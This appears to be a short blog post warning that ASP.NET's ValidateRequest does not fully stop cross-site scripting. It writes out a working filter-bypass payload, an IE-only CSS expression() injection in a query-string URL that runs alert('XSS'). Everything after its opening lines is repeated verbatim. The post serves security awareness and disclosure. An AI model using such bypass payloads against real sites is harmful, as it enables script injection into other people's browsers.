Lots of sites have been using ValidateRequest for a while, assuming it was secure. Unfortunately, it isn't.
E.g. If you try the following on a site with ValidateRequest active..
http://andy/xsstests/default.aspx?fname=<script>alert('xss')</script>
…you should see that the .net validation raises an error “A potentially dangerous Request.QueryString value was detected from the client (fname="<script>alert('xss')...").”
However if you were to follow the link below for the same page, still with ValidateRequest enabled… (IE only, but still..)
http://andy/xsstests/default.aspx?fname=<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
It'll execute perfectly happily.
It's still worth using ValidateRequest to deter automated attackers in the short term, but even bots will get wise to it soon enough.
For more detailed information, see the whitepaper which disclosed it.
E.g. If you try the following on a site with ValidateRequest active..
http://andy/xsstests/default.aspx?fname=<script>alert('xss')</script>
…you should see that the .net validation raises an error “A potentially dangerous Request.QueryString value was detected from the client (fname="<script>alert('xss')...").”
However if you were to follow the link below for the same page, still with ValidateRequest enabled… (IE only, but still..)
http://andy/xsstests/default.aspx?fname=<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
It'll execute perfectly happily.
It's still worth using ValidateRequest to deter automated attackers in the short term, but even bots will get wise to it soon enough.
For more detailed information, see the whitepaper which disclosed it.